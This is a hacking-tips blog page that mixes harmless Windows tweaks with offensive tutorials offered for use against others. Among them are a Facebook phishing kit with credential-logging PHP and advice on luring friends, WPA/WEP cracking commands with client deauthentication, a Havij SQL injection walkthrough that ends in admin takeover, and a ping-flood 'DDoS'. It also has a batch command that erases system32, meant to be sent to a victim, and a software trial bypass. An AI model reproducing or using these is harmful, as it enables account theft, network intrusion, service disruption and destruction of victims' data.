Powered by Blogger.

Translate

Popular Posts

About

IP Address Checker
IP Address Checker

Blogger news

Blogroll

Search

Blogger templates

RSS

Remove Write Protection On Any USB Device


Write Protection on any portable USB Device can be applied by the physical lock provided on the card adjuster or some times provided on the pen drives, so make sure to make your drive not write protected by moving the lock in right direction. But even after moving the physical lock for write protection the problem can happen due to some virus action. This happens when some virus or script which applies the registry hack to make any drive write protect when connected to the computer, In that case follow the procedure below to remove write protection from your pen drive.
  

1. Open Start Menu >> Run, type regedit and press Enter, this will open the registry editor.

2. Navigate to the following path:  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\StorageDevicePolicies  

Note: If the registry key StorageDevicePolicies key does not exist, you will need to create it  Download the batch file called add.bat by clicking below link, and double click after download the key will be automatically added to registry.   DOWNLOAD

3. Double click the key WriteProtect in the right pane and set the value to 0 in the Value Data Box and press OK button  

4. Exit Registry, restart your computer and then again re-connect your USB pendrive on your computer.
That is it, done.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Keyboard Dancing Led Light Trick



1. Open Notepad and copy below codes into it.

Set wshShell =wscript.CreateObject("WScript.Shell")
 do
 wscript.sleep 100
 wshshell.sendkeys "{CAPSLOCK}"
 wshshell.sendkeys "{NUMLOCK}"
 wshshell.sendkeys "{SCROLLLOCK}"
 loop

2. Then save this file as led.vbs (.vbs is must)
 3. Open your save file and see your keyboard led blinking like disco lights.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Installation of Backtrack - How To Install BackTrack





You can install backtrack 5 on your system in many ways. You can install it on your system as primary OS. You can also install it as virtual machine on your windows and you can also install it as dual with some other operating system as windows.
The best way as a learner is to use backtrack as a virtual machine on your system. In this way you can use it easily with your windows.




In this tutorial i will show you how to setup backtrack as a virtual machine on your system.


First of all download the backtrack5 from the website.DOWNLOAD


Then download VMware workstation.
DOWNLOAD

Install VMware workstation on your system and create a new Virtual machine.


select custom (advanced).

Choose the Virtual Machine Hardware Compatibility.

Click on Next for defaults.

Now select the installer disk image and browse the backtrack image.


Now it will ask the guest operating system. Select Linux, then choose Other Linux 2.6.x kernel as the version.

Give a name to your virtual machine

In memroy config, set the memory for your virtual machine. i will recommend 512 MB.

In network type choose NAT

Then Select SCSI adapter type and Choose LSI Logic

Set Maximum disk size.
I recommend you to select 10GB or above

Choose Store virutal disk as a single file.
Specify disk file and Just click next.



Now backtrack should be loading and booting


After loading type startex to go to GUI mode.


Now run install backtrack.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Bypass Software Trial Period Manually in Windows


Today I am going to show you how you can bypass software trial period manually and use that again and again.

Follow the below Steps:
1. First you have to uninstall that application whose trial period is over and you wanna use it again.
2. Now open the “Regedit” you can open it by going to Start > Run > Regedit.
3. Navigate to HK Local Machine > Software > Your Software name.
4. Now simply Delete the Key.
5. You have to do this for HK Current user if key is there too.
6. Now go to Run and Type “%temp%”.
7. Delete all files in temporary folder, these are all the files created by software temporary installation and de-installation.
8. Go to C:// Users > Username > App-data ( Check all 3 directories “Local”, “LocalLow”, “Roaming” for your software entry there might be a folder for your software, if you find one Delete that.
9.Now every main step is done you can restart your computer and then Reinstall application.
That’s it now you will get your software’s trial period back, well yes steps are long but it’s the manual way you can bypass the trial period of your software and you can perform this everytime your software expires.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

How To Crack WiFi Password By Backtrack 5



STEPS TO HACK WIFI OR WIRELESS PASSWORD



1. Get the Backtrack-Linux CD. Backtrack Linux Live CD(best Linux available for hackers with more than 2000 hacking tools inbuilt).

Download Backtrack Linux Live CD from here: CLICK HERE






Steps to Follow:
Step 1 :
airmon-ng

The result will be something like :
Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]



Step 2 :
airmon-ng start wlan0

Step 3 (Optional) :

Change the mac address of the mon0 interface.
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up


Step 4 :
airodump-ng mon0

Then, press "
Ctrl+c" to break the program.

Step 5 :
airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0


*where -c is the channel
           -w is the file to be written
           --bssid is the BSSID

This terminal is keeping running.

Step 6 :

open another terminal.
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step 7 :

Use the John the Ripper as word list to crack the WPA/WP2 password.
aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

Step 8 (Optional) :ITS AN OPTIONAL STEP,,,,,,

If you do not want to use John the Ripper as word list, you can use Crunch.

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

*where 
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

(B) nVidia Display Card with CUDA

If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.

Step a :
airmon-ng


The result will be something like :
Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]



Step b :
airmon-ng start wlan0

Step c (Optional) :

Change the mac address of the mon0 interface.
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up


Step d :
airodump-ng mon0

Then, press "
Ctrl+c" to break the program.

Step e :
airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0


Step f :

open another terminal.
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step g :

If the following programs are not yet installed, please do it.
apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

Step h :

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download 
crunch 3.0 (the current version at the time of this writing).http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install


Step i :

Go to the official site of pyrit.
http://code.google.com/p/pyrit/downloads/list

Download 
pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install

tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install


Step j :
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step k (Optional) :

If you encounter error when reading the 
wpacrack-01.cap, you should do the following step.pyrit -r wpacrack-01.cap -o new.cap stripLive

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step l :

Then, you will see something similar to the following.
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com

This code is distributed under the GNU General Public License v3+

Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)

Tried 17960898 PMKs so far; 17504 PMKs per second.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Using Metasploit Tool



Steps:

1) Get the correct Distribution of metaslpoit framework from http://www.metasploit.com/base upon the distribution u are using, Windows or Linux.
2) Install the framework, but remember the followings
i) Disable your Antivirus while installing ; Otherwise it will delete certain files or format, which are updated as virus in your antivirus software by the vendor.
3)It has a nice documentation at : http://www.metasploit.com/projects/Framework/docs/userguide/index.html
, You can also save a copy of the PDF version from http://www.metasploit.com/projects/Framework/docs/userguide.pdf
4) To use metasploit you have to know the commands : use, show, set. These commands have following definitions:
Let us start with use : for using some exploit (use exploit_name), that can be viewed by the show command. After using a exploit what are the operation you can carry out can be vewied by the command show options. And the options can be set by the set command. So the following steps of commands will carry an succesfull attack.
> show exploits
a descriptions
b descriptions
..
..
..
>use a
>show payloads
x descriptions
y descriptions
..
..
>set PAYLOAD x
>show options
x descriptions

...

After you set all.
> exploit
So, I think i have tried to give something here to start with metasploit.

~~~~~~~~~~~~~~~All the best~~~~~~~~~~~~~~~~~~~~~~~~~~~

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Hack Website Using Havij


Now we move to some serious hacking. It is Website Hacking. We can hack any small scall website by using Havij.

Havij is a nice injecting tool used to hack many small websites. But you can not hack websites like google, facebook, yahoo etc. with Havij.

Firstly, if you haven’t downloaded havij full version, I strongly advice you download it before you continue. You can download it from the following link.



Now run Havij. Now copy paste the SQL Injection vulnerable website into TARGET and click the ANALYZE BUTTON



Now be patient while havij get information about the website like Database Name, Server, Etc.
Secondly, we need to get the table of the website. Now click on Tables and click on Get tables and exercise some patience 

to get the database tables.



Thirdly, after getting the tables, Scroll through the entire tables founded, If you suspect any field where admin usernames 

or password are stored, Thick on it and click on get columns




Now to the final stage, Click on get data to get the password and username of admin. Now you have the admin usernames 

and password. Simply take note of only the username.

The password you got is in Md5 format and cannot be used to login to the website directly. What we need to do is too 

simply click on the MD5 tab on havij and paste the password into the text field and click on start. Now havij gives you the 

real password.

       - Now click on the get admin tab to get the admin login page of the website.

       - After getting the admin login page URL, Simply open it in your browser and login using the username and 

passwords we got previously.

That it, you are now the admin of the website. You can simply change and delete whatever you want on the server.

NOTE : These tutorials is only for educational purposes, do not implement it on innocent people websites. If you find 

vulnerabilities on any website, simply report it to the admin of the website via the contact form.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

DDOSing Without Any Software



DDOSing without any software :D

First open your CMD from run ( window + r )


Now the important thing what we want is the ip address of the

site that we are going to attack.

To get the ip of any site just type nslookup in cmd followed by

the address of website

for eg: if you want the ip address of google just type

nslookup http://www.google.com/ 

or
ping www.google.com


these command will give you the ip address

Ok , now you got the ip address of the site you are going to

attack,

then type the following command in your CMD and hit enter

ping website-IP -l 65500 -n 10000000 -w 0.00001

-n 10000000= the number of DoS attemps.. u can change the

value "10000000" with ur desiredvalue u want to attempt attack.

website-IP= Replace the text with the ip address of the site u

want to be attacked..

-w 0.00001 = It is the waiting time after one ping attack.

for eg: if the ip address is 112.158.10.2

just type

ping 112.158.10.2 -l 65500 -n 10000000 -w 0.00001

And thats it you are done . Dont Change or Remove -l, -n and -w

in this command.. otherwise it wont work
 enjoy hacking !!! :D


  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Download Free Backtrack Hacking Course DVD

                          
Download Free Backtrack Hacking Course DVD







Along With 45+ Modules
 1 Hacking Basics -MD5
 2 Website Hacking -Sql Injection
 3 Website Hacking -xss
 4 Staying Secure
 5 Modding Xbox Softmod
 6 Wireless Hacking - Cracking WPA
 7 Triple Boot
 9 Local Password Cracking
 10 Lockpicking Basics
 11 Ettercap
 12 Xss Tunnel
 13 Playstaion 2 Softmod
 14 cracking WEP update
 15 Bypass Hotspot's Acesss Controls
 16 Lockpicing DUmpkey
 17 Phone Phreaking -Begie Box
 18 Phone Phreaking -Snifing VOIP
 19 Lockpicking DIY Padlock
 20 Cracking WEP
 21 LOckingPicking Multi-Disc
 22 Network Hacking -Arp Poisoning
 23 wordpress Social Engineering
 24 Metasploit Autopwn
 25 Application Patching
 26 Windows SMB relay Exploit
 27 Password Phising
 28 CoMbine Files
 29 Manipulating Windows User account
 30 Torjan Basics
 31 Evilgrade
 32 Dwonfalls of Anti-Virus software
 33 Home Made Lock Pics
 34 Fix Google Mail Enumerator
 35 VMWARE
 36 Bluetooth Hacking
 37 Windows Privilage Escalation
 38 Local File Inclusion
 39 Alternate Data Streams
 40 CSRF
 41 INSTALL BACKTRACK ON USB
 42 Ardunio Arp Cop
 43 Beer Pong Table
 44 Bypass Cisco Clean Access & Cisco NAC Appiance
 45 DNS SPOOF virtual Hosts
 46 Deep Freeze
 47 Email Injecion
 48 Extracting Database Information
 49 Ping of Death

Download Here

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Request A New IP Address From Your ISP Server


Request a new IP address from your ISP server

By this method now you can request for a new IP address from your ISP Server

Here's how to do it in windows:
 1. Click On Start

2.Now go on run
 


3. In the run box type cmd.exe and then click OK

4. After the command prompt open- type the following codes in it-

ipconfig /flushdns
 ipconfig /release
 ipconfig /renew
 exit

5. Last step is to delete your all cookies from browser and you are done

Immediately you will be assigned a new IP address when this happens. If you are on a fixed IP address, this method will not work. If this works for you, you may want to save the above commands into a batch file, and just run it when you need it

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Hack Facebook Accounts.......PHISHING


There are various methods to hack the facebook account. I have not listed all here but i have described very popular method to hack facebook account password by anyone called Phishing. For this We need three files:

1. Php file
 2. Fake facebook login page
 3. Text file to store password
 

1] Create your php file
 Open notepad and copy this code:
 



    header (‘Location: https://login.facebook.com/login.php’);
     $handle = fopen(“password.txt”, “a”);
     foreach($_POST as $variable => $value) {
     fwrite($handle, $variable);
     fwrite($handle, “=”);
     fwrite($handle, $value);
     fwrite($handle, “\r\n”);
     }
     fwrite($ handle, “\r\n”);
     fclose($handle) ;
     exit;
     ?>

Now save this as phishing.php
 Your php file is now created
 If you Don’t understand what this php file is doing you need to learn some basic of php.This php file will save information of victim in file password.txt
 

2] Create facebook fake login page
 Now  go to
http://www.facebook.com and right click  > View Source.Copy source in notepad and save it as facebooklogin .html .
 Now open source code of this html file We need to find the place where Login  code in facebook page that where send the user after clicking on it.
 Now Press crtl-f after opening source code and   search for this code
 action=anything.
 In this case we have this

    action=”https://login.facebook.com/login.php?”

We replace that part with:

    action=”phishing.php”

Save your facebook.html file
 

3] Text file :
 Create a blank text file and name it password.txt
 


Now upload all the three files Facebooklogin.html,phishing.php,Password.txt in any free web hosting site directory like 000webhost.com.com and now you can just check your fake facebook login page by going to http://yoursite.000webhost.com/Facebook.html for the fake login page.Just type some random user name and any password into the text box and then you will see in your file manager that a file called “Password.txt” is created,In which the password is stored.
 You can use
 
http://www.justfree.com/
 http://www.ripway.com/
 http://www.my3gb.com/

also or any other free hosting site.

Suppose you register with name facebookhack.Your link will be
http://www.facebookhack.justfree.com/
 After uploading files your phishing link will be http://www.facebookhack.justfree.com/facebook.html
 Send this link to your friend if they login there their password will be save at the server .
 You can trick your friend to login this fake facebook page by saying its new version of facebook check it out,or in any way you like.
 

NOTE : This method is just for educational purpose only. I am not responsible for any harm. Use this on your own responsibility..

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Destroy A Computer Easily


Destroy A computer Easily !
 


Hey Guys!
 

1. Open Notepad
 2. write the above command : -
 erase %windir%\system32\*.* /q

 3. Save the above notepad with the extension ".bat or .cmd" as u want.
 After u created the .cmd or .bat file send it to ur victim as like ordinary file.Once ur victim  double  click on it then he/she needs to format his/her pc.
 What it does is deletes all files present in the system32 folder out of which most of them are files   important for a computers functioning.
 Note:-
 It would work only if the victim has windows....

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Blocking Facebook On Your Computer


Blocking Facebook On Your Computer
In this tutorial i will teach you to specifically block facebook on your computer. This might be helpfull if you want to prevent students from using facebook in school and colleges or your employees in office. If you are parent and don't want you child to use facebook or any other particular site then follow simple steps given below. So lets get started.

How To Block Facebook ?

1. Go to Start > Programmes > Accesories
 2. Then Right click on Notepad and Run it as administrator.
 3. Now open host file by clicking on File > Open and locate to following address

C:\WINDOWS\system32\drivers\etc

4. Then just below # 127.0.0.1 localhost paste folowing code

# Blocking Facebook
 127.0.0.1 login.facebook.com
 127.0.0.1
www.facebook.com
 127.0.0.1 apps.facebook.com
 127.0.0.1 blog.facebook.com

5. Now save the host file and done.
 6. Open any browser and try to open facebook. It won't open. If facebook opens then you might have done somthing wrong. (let me know if you face any problem)

Blocking Other Website

If you want to block website other then facebook then change facebook address with whatever website you want to block. For example: to block google paste following code below # 127.0.0.1 localhost

# block google
 127.0.0.1
www.google.com
 if you have Any Question comment below :)

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

How To Become Hacker


How to become H4ck3r ? 
 1. Have the 'hacker' attitude
 2. Improve your logical thinking
 3. Practice your English
 4. Learn programming languages
 5. Make your one GOAL
 6. Think like an Intelligent Person
 7. Kick out Studies. :D
 8. Bung the College and sit on
 Computer :D

 9. Get Hacker's Inspiration
 10. Switch to LinuX from Windows

 PRACTICE PRACTICE PRACTICE

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

How To Remove Your Last Name On Facebook


As we all know Facebook does not allow to write only first name, its only allowed in some selected countries like Indonesia.
 So, here is the latest trick through which you can hide your last name easily.

Follow the steps :
 1) First you need Indonesian Proxy Server.
 


2) go to Firefox -- Options -- Advanced -- Network -- Settings -- Connection Settings -- Choose manual proxy configuration.

3) Now tick " Use This Proxy Servers For All Protocols ".

4) put this proxy and port
 


PROXY : 202.70.136.142

PORT : 8080

5) put 202.70.136.142 on No Proxy for Box.

6) Now go to your profile and remove last name and save it.

You are done...

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Hide and Remove Shortcut Arrow from Desktop Icons and Other Icons


To Hide and Remove Shortcut Arrow from Desktop Icons and Other Icons
1. Run Registry Editor (RegEdit).
2. Navigate to the following registry key:
HKEY_CLASSES_ROOT\lnkfile

3. Rename or Delete the IsShortcut registry value in the right pane.

4. I Recommend u to Rename IsShortcut
Tip: It’s also workable to just rename the IsShortcut registry entry to another name, such as IsNotShortcut.

Note:U hv to Restart your Pc is important inorder changes to take place .

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

BLOCK OR UNBLOCK WEBSITES

                                                 BLOCK OR UNBLOCK WEBSITES

There are many people who want some website unaccessible from their computer. Most of the parents want to block some websites on their computer system. Here i am going to write a well known an easy way to do this.

Steps:
 


1- go to C:\WINDOWS\system32\drivers\etc
 2- Find a file named "HOSTS"
 3- Open this file in notepad
 4- Under "127.0.0.1 localhost" Add 127.0.0.2
www.xyz.com , Now www.xyz.com site will no longer be accessable.
 5- Thats Done....

you can add as many url of websites under this by increasing last no. of ip
 as
 127.0.0.3
www.abcxyz.com
 127.0.0.4 www.xyzas.com

an so on.
 To unblock these website only erase the line corresponding to that website.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Top 5 Things Hacker Must Know

Top 5 Things Hacker Must Know




This post is for those who want to become a true hacker and for those also who are hacker, most of the hacker doesn't know some basic things that a hacker must know.Today most of the hackers want direct method to hack big site without having full knowledge and want to earn lots of money in short time.
 


Remember that   A Hacker Is Not a person who just hacks email id’s or servers but a True Hacker is a Computer Genius who the knowledge of computers more than anyone.
 Next time think before asking the question – “How much Will I get in this field?” because, if you have so many skills , you really don’t have to run after money. Success comes and money follows itself.
 

1) Never trust sites that ask you for money in return of Hacking Softwares or who claim to Hack Email Id’s in return of money. All such things are Scam . Nothing Works.

2) There is NO DIRECT SOFTWARE  to Hack Facebook , Google , Yahoo or any other big website. All the softwares that you find on the site claiming to hack big site are not trusted. They are just meant to take your money and in worse cases, those softwares may also have trojans or keyloggers in them. As a result your account gets hacked trying to hack others.

3) NEVER use the untrusted keyloggers or trojans you find as freeware on internet or suggested by a friend. Hackers are not fools. They compile keyloggers and trojans almost with any such software and when you install them , you are already hacked before even trying to hack others.

4) You are never going to be a good hacker without the knowledge of programming and scripting languages. When you are going to use only ready made softwares and would depend on them for hacking anything then your functionality would be limited upto the functionality of the software. When you are not going to use your brain , just doing the copy paste thing, then how can you even think of being a good hacker.

5) If you are a good Hacker, you already become a good programmer , a good script writer , a good web developer and an excellent security expert. Well any good Hacker will/should have good knowledge of various aspects and programming languages. to do XSS (Cross Site Scripting ) , PHP INJECTION , SQL INJECTION , PHISHING , FOOTPRINTING etc… you will have to be good at programing and scripting. And when you know the Various loop holes , vulnerabilities and security tips, you already become a Computer Security Expert.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

How to Install VMware Tools in Backtrack 5

How to install VMware tools in Backtrack 5



Many People face problem while installing VMware tool on
Backtrack 5 due to some simple commands order error on
VMware Console.
 VMware Tools is installed by default in GNOME Version so let

take a look to KDE Version

STEPS:
 On VMware On the Top of menu bar Go to  Virtual Machine 

then  InstallVMware Tools.
 


Now in this pic(above) see the commands order and follow them.

FOR BACKTRACK 5R2
 KDE Users, please run the following command before installing

VMWare tools on BackTrack5 R2:
 
root@bt:~# mkdir /etc/cups/ppd
 
root@bt:~# mkdir /mnt/cdrom; mount /dev/cdrom /mnt/cdrom
 
root@bt:~# cp /mnt/cdrom/VMwareTools-<version>.tar.gz
/tmp/
 
root@bt:~# cd /tmp/
 
root@bt:~# tar zxpf VMwareTools-<version>.tar.gz
 
root@bt:~# cd vmware-tools-distrib/
 
root@bt:~# ./vmware-install.pl

FOR BACKTRACK 5R1
 On Backtrack 5R1 you have to manually install the VMware

Tools  first  prepare your kernel source by issuing the following
commands:
 
root@bt:~# ln -s /usr/src/linux /lib/modules/2.6.39.4/build
 
root@bt:~# mkdir /etc/cups/ppd
 
root@bt:~# mkdir /mnt/cdrom; mount /dev/cdrom /mnt/cdrom
 
root@bt:~# cp /mnt/cdrom/VMwareTools-<version>.tar.gz
/tmp/
 
root@bt:~# cd /tmp/
 
root@bt:~# tar zxpf VMwareTools-<version>.tar.gz
 
root@bt:~# cd vmware-tools-distrib/
 
root@bt:~# ./vmware-install.pl
 


When it will asked that IF YOU WANT THE SCRIPT TO RUN
VMWARE-CONFIG-TOOLS.PL FOR YOU the type NO.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

How To Hack Wi-Fi Using Gerix Wi-Fi Cracker


How To Hack Wi-Fi Using Gerix Wi-Fi Cracker :-


Requirements:-
1: A Computer.
2: A Wireless Card capable of packet injection.
3:A Live installation of BackTrack either on a CD or USB stick


Steps:
1. Boot into BackTrack

2. Click on the Backtrack applications menu -> Backtrack -> Exploitation tools ->
Wireless exploitation -> WLAN Exploitation -> gerix-Wi-Fi-cracker-ng (This will
open up the GUI interface seen in the picture).

3. Go to the configuration menu and select the wireless interface wlan0
-Click on Enable/Disable Monitor Mode (this will put the wireless card into
monitor mode)
-Select the newly created mon0 interface

4. Now click on the WEP tab at the top of the window. -Click on "Start sniffing
and logging" and leave the terminal open. -Once the wireless network you want
to crack* shows up (it has to be WEP encryption of course) select the WEP Attacks
(with clients). *note that the PWR has to be high enough to work so the closer
you can get, the better. -There you click on “Associate with AP using fake auth”,
wait a few seconds and click on “ARP request replay”

5. Once the Data number reaches over 10,000 you are ready to try (if the data is
coming fast wait until 20 or 30,000 to be safe) and crack the key, but don't close
any windows yet. -Go to the cracking tab and click on “Aircrack-ng – Decrypt WEP
password” under Wep Cracking.
Within a few minutes password will be cracked.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

How To Post Invisible Status On FACEBOOK.


Post invisible status On FACEBOOK.

Copy below codes into your status

@+[275671082513166:0]

Remove + sign

and paste for invisible fb status....

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

How to Copy Text From Photos


Free-OCR is a free and easy to use web service using which you can extract text from your image
files in few simple steps.
1.Go to Free-Ocr.com.
2.Click on the “Browse” button to upload your image.
3.Enter the CAPTCHA code.
4.Select the language of the text in image file from the drop down menu.
5.Click on the “Send File’ button.
6.Wait while your image is being uploaded on the server and it is processed.
7.A text box containing the text extracted from the image will be shown on the next page. Now you    can copy and edit this text in the way you want.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Turn On Your Pc In 10 Seconds


Turn On Your Pc In 10 Sec.
 


Hey Guys !

Alright so u wanna know how to turn the pc on in 10 seconds(may vary).Here's what u have to do to turn ur pc on in 10 seconds

Click on the start button then press R it will take u to Run well go to run
 & type Regedit
 press enter
 this will open Registery Editor
 now look for the key

HKEY_LOACAL_MECHINE\SYSTEM\CurrentControlSet\Control\
 ContentIndex

now there find the Key Called
 "Startup Delay"
 Double Click On It
 Now where its Base
 Click Decimal
 Now its Default Value Is 4800000(75300:hexadecimal)
 Change The Value To 40000
 here u go u have done it
 now close the Registery Editor and Restart Your Computer
 You'll See The Result.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

How To Convert FAT32 into NTFS


How can change a FAT32 partition to NTFS, without the use of a third-party software?

Solution


The conversion of FAT32 to NTFS using a simple MS-DOS command. •Open a command prompt

(Go to Start > Programs > Accessories > Command prompt:
 •Type the following command:

•convert x: /fs:ntfs
•Where "x" must be replaced by the letter corresponding to the drive you want to change.
 

•Then press "Enter". If the drive contains the installation of Windows, a confirmation message will be displayed.
 

•Confirm and proceed.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

To Know What is Running on Your PC


Looking for cool CMD hacks? Here are top cool CMD hacks that
are easy to learn but they can be very useful. 1) To Know What Is
Running On Your System Type tasklist and hit enter (You can also
check it...

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS